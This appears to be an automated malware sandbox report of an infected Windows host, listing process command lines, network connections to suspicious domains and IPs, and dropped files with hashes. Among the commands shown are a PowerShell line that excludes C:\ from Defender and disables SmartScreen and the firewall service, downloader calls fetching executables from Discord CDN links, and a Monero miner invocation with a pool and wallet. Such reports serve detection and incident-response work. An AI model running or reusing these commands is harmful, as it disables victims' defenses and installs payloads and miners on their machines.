C:\Users\Admin\AppData\Local\Temp\2F3A.exe

C:\Users\Admin\AppData\Local\Temp\3517.exe

C:\Users\Admin\AppData\Local\Temp\3517.exe

C:\Users\Admin\AppData\Local\Temp\3C5B.exe

C:\Users\Admin\AppData\Local\Temp\3C5B.exe

C:\Users\Admin\AppData\Local\Temp\48FE.exe

C:\Users\Admin\AppData\Local\Temp\48FE.exe

C:\Users\Admin\AppData\Local\Temp\512D.exe

C:\Users\Admin\AppData\Local\Temp\512D.exe

C:\Users\Admin\AppData\Local\Temp\5B50.exe

C:\Users\Admin\AppData\Local\Temp\5B50.exe

C:\Users\Admin\AppData\Local\Temp\6023.exe

C:\Users\Admin\AppData\Local\Temp\6023.exe

C:\Users\Admin\AppData\Local\Temp\6023.exe

C:\Users\Admin\AppData\Local\Temp\6023.exe

C:\Users\Admin\AppData\Local\Temp\6B21.exe

C:\Users\Admin\AppData\Local\Temp\6B21.exe

C:\Users\Admin\AppData\Local\Temp\6B21.exe

C:\Users\Admin\AppData\Local\Temp\6B21.exe

C:\Users\Admin\AppData\Local\Temp\6023.exe

C:\Users\Admin\AppData\Local\Temp\6023.exe

C:\Users\Admin\AppData\Local\Temp\6F48.exe

C:\Users\Admin\AppData\Local\Temp\6F48.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\6FED.bat C:\Users\Admin\AppData\Local\Temp\6F48.exe"

C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe

C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/880498551011049495/883407469894856764/33.exe" "33.exe" "" "" "" "" "" ""

C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe

C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/889204878965088268/889206644829982770/PLQRfphz.exe" "PLQRfphz.exe" "" "" "" "" "" ""

C:\Users\Admin\AppData\Local\Temp\21598\PLQRfphz.exe

PLQRfphz.exe

C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe

C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe "" "" "" "" "" "" "" "" ""

C:\Users\Admin\AppData\Local\Temp\745A.exe

C:\Users\Admin\AppData\Local\Temp\745A.exe

C:\Users\Admin\AppData\Local\Temp\fl.exe

"C:\Users\Admin\AppData\Local\Temp\fl.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(exit)

C:\ProgramData\Systemd\dllhoster.exe

-o pool.supportxmr.com:5555 -u 44z5DkTXSYBfYECbt5TdQ2SUpyAQJmmGubyUsWqzcByeKwxwsWSZabZQMuE39hedNcTL15eK8kHrAeZMUdGGmHQHBzNH5db -p bloodteam --coin=XMR --cpu-max-threads-hint=35

C:\Users\Admin\AppData\Local\Temp\199b1g.exe

"C:\Users\Admin\AppData\Local\Temp\199b1g.exe"

C:\Users\Admin\AppData\Local\Temp\SparestPeculation_2021-09-19_16-22.exe

"C:\Users\Admin\AppData\Local\Temp\SparestPeculation_2021-09-19_16-22.exe"

C:\Users\Admin\AppData\Local\Temp\test.exe

"C:\Users\Admin\AppData\Local\Temp\test.exe"

C:\Users\Admin\AppData\Local\Temp\199b1g.exe

"C:\Users\Admin\AppData\Local\Temp\199b1g.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 924

C:\Users\Admin\AppData\Roaming\7974777.scr

"C:\Users\Admin\AppData\Roaming\7974777.scr" /S

Network

Country Destination Domain Proto
US 8.8.8.8:53 venerynnet1.top udp
US 8.8.8.8:53 kevonahira2.top udp
RU 45.144.67.29:80 kevonahira2.top tcp
RU 45.144.67.29:80 kevonahira2.top tcp
RU 45.144.67.29:80 kevonahira2.top tcp
RU 45.144.67.29:80 kevonahira2.top tcp
RU 45.144.67.29:80 kevonahira2.top tcp
RU 45.144.67.29:80 kevonahira2.top tcp
RU 45.144.67.29:80 kevonahira2.top tcp
NL 190.2.145.108:12608 tcp
RU 45.144.67.29:80 kevonahira2.top tcp
RU 45.144.67.29:80 kevonahira2.top tcp
NL 193.56.146.36:80 193.56.146.36 tcp
RU 45.144.67.29:80 kevonahira2.top tcp
RU 45.144.67.29:80 kevonahira2.top tcp
US 8.8.8.8:53 iryarahara.xyz udp
RU 77.246.145.4:80 iryarahara.xyz tcp
RU 45.144.67.29:80 kevonahira2.top tcp
RU 45.144.67.29:80 kevonahira2.top tcp
RU 45.144.67.29:80 kevonahira2.top tcp
RU 45.9.20.20:13441 tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 telete.in udp
DE 195.201.225.248:443 telete.in tcp
DE 74.119.192.122:80 74.119.192.122 tcp
RU 45.144.67.29:80 kevonahira2.top tcp
RU 45.144.67.29:80 kevonahira2.top tcp
DE 74.119.192.122:80 74.119.192.122 tcp
US 104.26.13.31:443 api.ip.sb tcp
NL 190.2.145.156:80 tcp
RU 45.144.67.29:80 kevonahira2.top tcp
RU 45.144.67.29:80 kevonahira2.top tcp
US 104.26.13.31:443 api.ip.sb tcp
RU 45.144.67.29:80 kevonahira2.top tcp
RU 45.144.67.29:80 kevonahira2.top tcp
RU 45.144.67.29:80 kevonahira2.top tcp
NL 45.67.231.145:10991 tcp
RU 45.144.67.29:80 kevonahira2.top tcp
RU 45.144.67.29:80 kevonahira2.top tcp
RU 45.144.67.29:80 kevonahira2.top tcp
RU 45.144.67.29:80 kevonahira2.top tcp
US 104.26.13.31:443 api.ip.sb tcp
RU 45.144.67.29:80 kevonahira2.top tcp
RU 45.144.67.29:80 kevonahira2.top tcp
RU 45.144.67.29:80 kevonahira2.top tcp
RU 45.144.67.29:80 kevonahira2.top tcp
RU 45.144.67.29:80 kevonahira2.top tcp
RU 45.144.67.29:80 kevonahira2.top tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
RU 45.144.67.29:80 kevonahira2.top tcp
NL 45.81.225.228:10774 tcp
US 104.26.13.31:443 api.ip.sb tcp
FI 135.181.208.162:49195 tcp
US 34.210.194.227:80 tcp
US 104.26.13.31:443 api.ip.sb tcp
US 104.26.13.31:443 api.ip.sb tcp
US 104.26.13.31:443 api.ip.sb tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 iplogger.org udp
DE 88.99.66.31:80 iplogger.org tcp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 52.217.33.252:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 pool.supportxmr.com udp
FR 149.202.83.171:5555 pool.supportxmr.com tcp
US 8.8.8.8:53 dependstar.bar udp
US 172.67.160.135:443 dependstar.bar tcp
SC 185.215.113.104:18754 tcp
DE 88.99.66.31:443 iplogger.org tcp
DE 88.99.66.31:443 iplogger.org tcp
RU 91.142.77.155:5469 tcp
US 8.8.8.8:53 product-review-now.bar udp
US 172.67.128.27:443 product-review-now.bar tcp
US 104.26.13.31:443 api.ip.sb tcp
US 104.26.13.31:443 api.ip.sb tcp

Files

memory/4716-115-0x0000000000400000-0x0000000000408000-memory.dmp

memory/4716-116-0x0000000000402DCE-mapping.dmp

memory/4696-117-0x0000000000030000-0x0000000000039000-memory.dmp

memory/3080-118-0x0000000002960000-0x0000000002975000-memory.dmp

memory/4784-119-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\215E.exe

MD5 9b739fca61cbe5a22bfe0b77cce75697
SHA1 386760ae9e2cea9bf737e48d0d77c5b29ae9b1bd
SHA256 c59cecf273089ec7e37fcc7a55b135067644dc3bd90abb4c6f81d9fd63744201
SHA512 06377ab9e2e666bef740c8c1e7c194d38d60457728efb109bf59e1fbd5a23661acaafae90b7b230d43f067eb5bf806e8cc2eac8d12104d6c14bbac8e39ddb7fc

C:\Users\Admin\AppData\Local\Temp\215E.exe

MD5 9b739fca61cbe5a22bfe0b77cce75697
SHA1 386760ae9e2cea9bf737e48d0d77c5b29ae9b1bd
SHA256 c59cecf273089ec7e37fcc7a55b135067644dc3bd90abb4c6f81d9fd63744201
SHA512 06377ab9e2e666bef740c8c1e7c194d38d60457728efb109bf59e1fbd5a23661acaafae90b7b230d43f067eb5bf806e8cc2eac8d12104d6c14bbac8e39ddb7fc

memory/4784-123-0x0000000000F90000-0x0000000000F91000-memory.dmp

memory/4784-125-0x0000000005770000-0x0000000005771000-memory.dmp

memory/4784-126-0x0000000000F70000-0x0000000000F71000-memory.dmp

memory/4784-127-0x0000000077DF0000-0x0000000077F7E000-memory.dmp

memory/4784-128-0x0000000005270000-0x0000000005271000-memory.dmp

memory/4784-129-0x0000000002E30000-0x0000000002E31000-memory.dmp

memory/4784-130-0x0000000002E90000-0x0000000002E91000-memory.dmp

memory/4784-131-0x0000000002F20000-0x0000000002F21000-memory.dmp

memory/4920-132-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\2F3A.exe

MD5 2276594f6417179702443734cc89341a
SHA1 2afd398c0408c5c41062a5ca0d43528e9a510ddf
SHA256 4c9c430cdca2a818a7c532a1ba924670bdd01e61f4e7d574123daab677e4c76e
SHA512 cb023e562b73a297eb3f2c1f6577fb33635af0da31d1264a60a664dc59bbce84d723a498dba54be34adffece90aa76ac4e269a3aad50559424b3dfe6ba0bbf85

memory/4920-135-0x00000000009C0000-0x00000000009C1000-memory.dmp

memory/4920-140-0x0000000077DF0000-0x0000000077F7E000-memory.dmp

memory/4920-141-0x0000000005A00000-0x0000000006006000-memory.dmp

memory/5024-144-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3517.exe

MD5 4a93f552d9a2747b134be963c4d1b044
SHA1 7b96e56bc6b7df56ac4d0cda72dbc2d9be65f0e4
SHA256 33bb7d8584f1353b048c0227977e9531a4125188a960babbc2a26307ca158275
SHA512 d10962a7c0027ca5dafda2e9ebc236b04284c4542f65e3cea9ec423b29012ed7fc111579e73f0b46d6e3be0ed020dc23c784c5f281abcf02071cfd904fdf1ab5

C:\Users\Admin\AppData\Local\Temp\3517.exe

MD5 4a93f552d9a2747b134be963c4d1b044
SHA1 7b96e56bc6b7df56ac4d0cda72dbc2d9be65f0e4
SHA256 33bb7d8584f1353b048c0227977e9531a4125188a960babbc2a26307ca158275
SHA512 d10962a7c0027ca5dafda2e9ebc236b04284c4542f65e3cea9ec423b29012ed7fc111579e73f0b46d6e3be0ed020dc23c784c5f281abcf02071cfd904fdf1ab5

memory/5024-147-0x0000000000780000-0x00000000007B0000-memory.dmp

memory/5024-148-0x0000000000400000-0x0000000000460000-memory.dmp

memory/5024-149-0x00000000021A0000-0x00000000021BF000-memory.dmp

memory/5024-150-0x0000000004940000-0x0000000004941000-memory.dmp

memory/5024-151-0x0000000004E90000-0x0000000004EAE000-memory.dmp

memory/4100-153-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3C5B.exe

MD5 896c7cca8317b58fc449155ea1272121
SHA1 b860f4e8e49b2c446d2b85a3e8b236e583c0ec1e
SHA256 d565d2c479fd0cb15d644f82ead1c64173f67e5b6dabcde7a215010c894a607c
SHA512 a32a30c6cdab14e0f249512db27cab391e62364b8f9fb099cf6be5b159906012f2fb8128d6d310b4ec6373354c98f9a140c448479fe86ed03ed0fff051f8326a

C:\Users\Admin\AppData\Local\Temp\3C5B.exe

MD5 896c7cca8317b58fc449155ea1272121
SHA1 b860f4e8e49b2c446d2b85a3e8b236e583c0ec1e
SHA256 d565d2c479fd0cb15d644f82ead1c64173f67e5b6dabcde7a215010c894a607c
SHA512 a32a30c6cdab14e0f249512db27cab391e62364b8f9fb099cf6be5b159906012f2fb8128d6d310b4ec6373354c98f9a140c448479fe86ed03ed0fff051f8326a

memory/5024-160-0x0000000002170000-0x0000000002171000-memory.dmp

memory/5024-161-0x0000000002172000-0x0000000002173000-memory.dmp

memory/5024-163-0x0000000002174000-0x0000000002176000-memory.dmp

memory/5024-162-0x0000000002173000-0x0000000002174000-memory.dmp

memory/4784-164-0x0000000006A30000-0x0000000006A31000-memory.dmp

memory/4784-165-0x0000000007130000-0x0000000007131000-memory.dmp

memory/4784-166-0x0000000006C00000-0x0000000006C01000-memory.dmp

memory/4784-168-0x0000000006E10000-0x0000000006E11000-memory.dmp

memory/4784-169-0x0000000006F30000-0x0000000006F31000-memory.dmp

memory/4100-170-0x00000000009D0000-0x0000000000A60000-memory.dmp

memory/4100-171-0x0000000000400000-0x0000000000493000-memory.dmp

memory/4784-172-0x0000000006FD0000-0x0000000006FD1000-memory.dmp

\Users\Admin\AppData\LocalLow\sqlite3.dll

MD5 f964811b68f9f1487c2b41e1aef576ce
SHA1 b423959793f14b1416bc3b7051bed58a1034025f
SHA256 83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512 565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

memory/4128-174-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\48FE.exe

MD5 fbe52cb1e8984491597e95d1be29b921
SHA1 2e46c6964739e2de11b1be7d7666738d28021a76
SHA256 fad3d5106b87c610a2203218a84d3a74469da11818882ea9a7d75f001ca639a3
SHA512 1675d8ec937e24debd9638ad53e98ea23a71b9e5483538c1d731ca8c21e055fd07decf5d0d7f4d544efecfbe6827821f82ce0b63dffc05270e274b784fad03d2

C:\Users\Admin\AppData\Local\Temp\48FE.exe

MD5 fbe52cb1e8984491597e95d1be29b921
SHA1 2e46c6964739e2de11b1be7d7666738d28021a76
SHA256 fad3d5106b87c610a2203218a84d3a74469da11818882ea9a7d75f001ca639a3
SHA512 1675d8ec937e24debd9638ad53e98ea23a71b9e5483538c1d731ca8c21e055fd07decf5d0d7f4d544efecfbe6827821f82ce0b63dffc05270e274b784fad03d2

memory/4128-177-0x0000000077DF0000-0x0000000077F7E000-memory.dmp

memory/4128-179-0x0000000000D50000-0x0000000000D51000-memory.dmp

memory/4128-193-0x0000000005550000-0x0000000005551000-memory.dmp

memory/4448-194-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\512D.exe

MD5 66a44c759def3503e2ebfabca517cfa0
SHA1 ca4bf41eec17ba26831cf61fcf0cec4c306a8f4b
SHA256 c0a67126590124954c0a73f103b9f1f04d0aee8b4df2968f124a801b7cdf87fe
SHA512 ae8d879e313aa2813144c55538fef04d60d282e8de0dc12f8ef04068d3bc69e83ba2073028706f882a7bd2df8819c3bd5b5435009bd363864644b8ccb220e360

C:\Users\Admin\AppData\Local\Temp\512D.exe

MD5 66a44c759def3503e2ebfabca517cfa0
SHA1 ca4bf41eec17ba26831cf61fcf0cec4c306a8f4b
SHA256 c0a67126590124954c0a73f103b9f1f04d0aee8b4df2968f124a801b7cdf87fe
SHA512 ae8d879e313aa2813144c55538fef04d60d282e8de0dc12f8ef04068d3bc69e83ba2073028706f882a7bd2df8819c3bd5b5435009bd363864644b8ccb220e360

\Users\Admin\AppData\LocalLow\uS0wV5wY9qH3\nss3.dll

MD5 02cc7b8ee30056d5912de54f1bdfc219
SHA1 a6923da95705fb81e368ae48f93d28522ef552fb
SHA256 1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA512 0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

\Users\Admin\AppData\LocalLow\uS0wV5wY9qH3\mozglue.dll

MD5 eae9273f8cdcf9321c6c37c244773139
SHA1 8378e2a2f3635574c106eea8419b5eb00b8489b0
SHA256 a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc
SHA512 06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

memory/4784-199-0x00000000070E0000-0x00000000070E1000-memory.dmp

memory/4448-207-0x0000000002500000-0x00000000025D2000-memory.dmp

memory/4448-208-0x0000000000400000-0x0000000000563000-memory.dmp

memory/4488-209-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5B50.exe

MD5 a8386e3c88de25a8f904fdfa69daac69
SHA1 017860c60d4ba68e2a16243804088f79d246055d
SHA256 09b828682642001d90e518edc46110245320f0e69c99a9e2733ca4818614b2d1
SHA512 68c77c76f61808fa2baa5f76f61315a12987bf7b277afc75f8d5dde0f4d315f524d1d157fd435fd24cb4d4fb050ce55947eca2696b4168c7340912b1c43d4b9c

memory/4488-212-0x0000000000B40000-0x0000000000B41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6023.exe

MD5 922f4c38e12bd2de4922322c2b4e41ab
SHA1 4e0d25705cfba043fefbaaadebedbb3836220aa6
SHA256 4d5dd2f34ad1fc1c1930097678e16d11a8753b36279f5531b1b6f0a4fd3288ba
SHA512 239cde5d1a89ef36b6a392170a24489e248dcaaff1b108bf1611121bcfd746d8c97a27caae1d513f0815e23c8e2eae3b7cdb88b35335971255490ae6c95362f2

memory/4600-219-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6023.exe

MD5 922f4c38e12bd2de4922322c2b4e41ab
SHA1 4e0d25705cfba043fefbaaadebedbb3836220aa6
SHA256 4d5dd2f34ad1fc1c1930097678e16d11a8753b36279f5531b1b6f0a4fd3288ba
SHA512 239cde5d1a89ef36b6a392170a24489e248dcaaff1b108bf1611121bcfd746d8c97a27caae1d513f0815e23c8e2eae3b7cdb88b35335971255490ae6c95362f2

memory/4600-222-0x0000000000110000-0x0000000000111000-memory.dmp

memory/4488-225-0x00000000034C0000-0x00000000034C1000-memory.dmp

memory/4488-223-0x0000000077DF0000-0x0000000077F7E000-memory.dmp

memory/4600-229-0x0000000002420000-0x0000000002421000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6B21.exe

MD5 8cb90073d09036b3732ac02b912cdf91
SHA1 17182316980a955f085c7ff74d7442709b6cc62f
SHA256 32950322c0e9d0581faea99fdf06703ef6e0c1eab9ef2a720c400ef69e036b09
SHA512 ed9f27ec50fd1aad40c90a31b11fa67214f94eb7216ee936b8ef25bc18907f773088c5b961421f8d902ecc7c3f5559a6e3326d54ae898eb4d19548cd4031a29f

memory/616-238-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6B21.exe

MD5 8cb90073d09036b3732ac02b912cdf91
SHA1 17182316980a955f085c7ff74d7442709b6cc62f
SHA256 32950322c0e9d0581faea99fdf06703ef6e0c1eab9ef2a720c400ef69e036b09
SHA512 ed9f27ec50fd1aad40c90a31b11fa67214f94eb7216ee936b8ef25bc18907f773088c5b961421f8d902ecc7c3f5559a6e3326d54ae898eb4d19548cd4031a29f

memory/616-246-0x0000000005600000-0x0000000005601000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6023.exe

MD5 922f4c38e12bd2de4922322c2b4e41ab
SHA1 4e0d25705cfba043fefbaaadebedbb3836220aa6
SHA256 4d5dd2f34ad1fc1c1930097678e16d11a8753b36279f5531b1b6f0a4fd3288ba
SHA512 239cde5d1a89ef36b6a392170a24489e248dcaaff1b108bf1611121bcfd746d8c97a27caae1d513f0815e23c8e2eae3b7cdb88b35335971255490ae6c95362f2

memory/1192-248-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6F48.exe

MD5 5a69e2f5e30d05abb8b5367aba095f4c
SHA1 8cea80c4135c54e831c3751e6b25d8ceb2720703
SHA256 854d953d7bc8a95f98e238c9499cae881e8ca8d32020527f7a297a708aeb7ac3
SHA512 dc0ec0cf9392c720c6634e3ebac6b7f8e20800f4fc3e6f9110628efa7019ace21d30a61a2c98f03b121bc55a665175ad97dad96e7e43a1d61d8cb1051a11dbd7

C:\Users\Admin\AppData\Local\Temp\6F48.exe

MD5 5a69e2f5e30d05abb8b5367aba095f4c
SHA1 8cea80c4135c54e831c3751e6b25d8ceb2720703
SHA256 854d953d7bc8a95f98e238c9499cae881e8ca8d32020527f7a297a708aeb7ac3
SHA512 dc0ec0cf9392c720c6634e3ebac6b7f8e20800f4fc3e6f9110628efa7019ace21d30a61a2c98f03b121bc55a665175ad97dad96e7e43a1d61d8cb1051a11dbd7

memory/1488-251-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\6FED.bat

MD5 23e71d6fea8aa3a5b563b3d6f3eb6a8d
SHA1 a84dd72ec8513ed7891eb1f31259379b835229d6
SHA256 957938e9c0d901f9e96e36e04fc6a8e250808725559c406cf53573554ad129ad
SHA512 199ef9a30e4d11e9e584d9c50d348d8ff5266c50c59e8eae3149c99dcddde03371f0a464c547e95aef8e03e1ee8db5985e103bd0f6218af42fa67c2dc89ab093

memory/1588-253-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe

MD5 b019efc4814c7a73b1413a335be1fa13
SHA1 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256 a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512 d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe

MD5 b019efc4814c7a73b1413a335be1fa13
SHA1 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256 a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512 d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe

MD5 b019efc4814c7a73b1413a335be1fa13
SHA1 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256 a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512 d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

memory/1952-256-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\21598\33.exe

MD5 a6a676051f857d516f6c4bec595a7cfb
SHA1 10e7c48a109ffbe60fa7ab3585c4bd711942cbd2
SHA256 98686e602b5f75bbceb801ca315617579ad9ffe9e2df66d49673ea35a7e1f343
SHA512 df302b28e5897bac668ad1ae2b32d2424af7c8cdf4527ac54ea268e6e9fbf41efe28b236af25ceacb5e5acd95b6c99b8cf95fa735687358a265bd59e2b127ba6

memory/2132-259-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\21598\PLQRfphz.exe

MD5 5aeb767b510b7f98e34bacfb48ad6aee
SHA1 c76d2a201687988213bf097e07db45a840131025
SHA256 a354c672e502b1f84041b96c0db87f9f63868908ab01a9d993476854de4834a7
SHA512 0f07af063e61a0b5651c1a1fbd12e776e8f9c7725c893b11bffb3e54f5eb3cd71ced4a37caac512b3a028157e886338ff6e42a8fd3f8c11c649b0afeb251914b

memory/2248-261-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\21598\PLQRfphz.exe

MD5 5aeb767b510b7f98e34bacfb48ad6aee
SHA1 c76d2a201687988213bf097e07db45a840131025
SHA256 a354c672e502b1f84041b96c0db87f9f63868908ab01a9d993476854de4834a7
SHA512 0f07af063e61a0b5651c1a1fbd12e776e8f9c7725c893b11bffb3e54f5eb3cd71ced4a37caac512b3a028157e886338ff6e42a8fd3f8c11c649b0afeb251914b

C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe

MD5 b019efc4814c7a73b1413a335be1fa13
SHA1 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256 a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512 d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

C:\Users\Admin\AppData\Local\Temp\745A.exe

MD5 c8d4b455187ceb42f74d7786911a37ea
SHA1 350fc1dbface497fe660ecde0194d8b5b34dfcf5
SHA256 40e766ae6379c7b1e8cace0538a16db203c26bd6a84bab99fa79ee0dcc6abd4f
SHA512 5f1133ad01741ec6d367e1aaafbc962763b608c12502df224c488305d72caf75a84cbad7a45e9b342b4bee4289df012b0368a431869876f618cdf1e0ab21c0fd

memory/2704-271-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\745A.exe

MD5 c8d4b455187ceb42f74d7786911a37ea
SHA1 350fc1dbface497fe660ecde0194d8b5b34dfcf5
SHA256 40e766ae6379c7b1e8cace0538a16db203c26bd6a84bab99fa79ee0dcc6abd4f
SHA512 5f1133ad01741ec6d367e1aaafbc962763b608c12502df224c488305d72caf75a84cbad7a45e9b342b4bee4289df012b0368a431869876f618cdf1e0ab21c0fd

memory/2132-276-0x0000000005190000-0x0000000005796000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6B21.exe

MD5 8cb90073d09036b3732ac02b912cdf91
SHA1 17182316980a955f085c7ff74d7442709b6cc62f
SHA256 32950322c0e9d0581faea99fdf06703ef6e0c1eab9ef2a720c400ef69e036b09
SHA512 ed9f27ec50fd1aad40c90a31b11fa67214f94eb7216ee936b8ef25bc18907f773088c5b961421f8d902ecc7c3f5559a6e3326d54ae898eb4d19548cd4031a29f

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\6B21.exe.log

MD5 41fbed686f5700fc29aaccf83e8ba7fd
SHA1 5271bc29538f11e42a3b600c8dc727186e912456
SHA256 df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437
SHA512 234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

memory/768-283-0x000000000041C5DE-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\6023.exe.log

MD5 41fbed686f5700fc29aaccf83e8ba7fd
SHA1 5271bc29538f11e42a3b600c8dc727186e912456
SHA256 df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437
SHA512 234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

C:\Users\Admin\AppData\Local\Temp\6023.exe

MD5 922f4c38e12bd2de4922322c2b4e41ab
SHA1 4e0d25705cfba043fefbaaadebedbb3836220aa6
SHA256 4d5dd2f34ad1fc1c1930097678e16d11a8753b36279f5531b1b6f0a4fd3288ba
SHA512 239cde5d1a89ef36b6a392170a24489e248dcaaff1b108bf1611121bcfd746d8c97a27caae1d513f0815e23c8e2eae3b7cdb88b35335971255490ae6c95362f2

memory/1136-296-0x000000000041C606-mapping.dmp

memory/768-308-0x0000000004E60000-0x0000000005466000-memory.dmp

memory/1136-309-0x0000000005A10000-0x0000000006016000-memory.dmp

memory/4548-329-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\fl.exe

MD5 7f34c12f88020dcc02f994529fb48222
SHA1 41446495e7817e0d5eb2a1c51a7f0984b56d36f8
SHA256 38582026970861e90f4f3f15da60fa5c8bc8759a2fab6c58a6c262d9096ac1e4
SHA512 c6373d56a0496f88d129bdf614e5ec063a7c02a84cfd8f37dd83208d3cfedce7de1cd534c25d3ffcb260c31f5792df7371fc795b152095c5a71eecd93bbdc5a9

C:\Users\Admin\AppData\Local\Temp\fl.exe

MD5 7f34c12f88020dcc02f994529fb48222
SHA1 41446495e7817e0d5eb2a1c51a7f0984b56d36f8
SHA256 38582026970861e90f4f3f15da60fa5c8bc8759a2fab6c58a6c262d9096ac1e4
SHA512 c6373d56a0496f88d129bdf614e5ec063a7c02a84cfd8f37dd83208d3cfedce7de1cd534c25d3ffcb260c31f5792df7371fc795b152095c5a71eecd93bbdc5a9

memory/4536-333-0x0000000000000000-mapping.dmp

memory/4536-345-0x00000233F4580000-0x00000233F4582000-memory.dmp

memory/4536-346-0x00000233F4583000-0x00000233F4585000-memory.dmp

memory/4536-347-0x00000233F4586000-0x00000233F4588000-memory.dmp

memory/4536-392-0x00000233F4588000-0x00000233F4589000-memory.dmp

memory/1488-393-0x0000000000000000-mapping.dmp

